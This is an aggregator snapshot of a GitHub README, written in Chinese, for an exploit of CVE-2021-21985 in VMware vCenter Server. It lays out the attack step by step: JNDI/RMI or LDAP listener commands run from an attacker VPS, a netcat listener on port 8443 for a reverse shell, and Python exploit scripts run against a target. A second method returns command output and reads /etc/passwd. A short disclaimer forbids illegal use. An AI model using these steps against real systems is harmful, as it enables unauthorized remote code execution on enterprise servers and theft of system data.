9
Github GitHub - r0ckysec/CVE-2021-21985: CVE-2021-21985 VMware vCenter Server远...
source link: https://github.com/r0ckysec/CVE-2021-21985
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2021-21985
CVE-2021-21985 EXP
本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。
0x01 利用Tomcat RMI RCE
1. VPS启动JNDI监听 1099 端口
rmi需要bypass高版本jdk
java -jar JNDIInjection-Bypass.jar 1099 <cmd> <rmi_ip>
或者利用ldap协议(未测试)
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:8080/#Exploit
ldap://ip:port/Exploit
2. VPS启动nc监听 8443 端口
nc -lvp 8443
3. 执行python脚本
python3 CVE-2021-21985_exp.py <target> <rmi://ip/class>
help
RCE!
0x02 构造可回显RCE
1. 构造 xml文件 2. 压缩成zip 3. 注入SystemProperties 4. 通过getProperty获取内存中命令结果
执行CVE-2021-21985_echo.py
python3 CVE-2021-21985_echo.py https://x.x.x.x <cmd>
执行 whoami
执行 cat /etc/passwd
Reference
https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/
https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK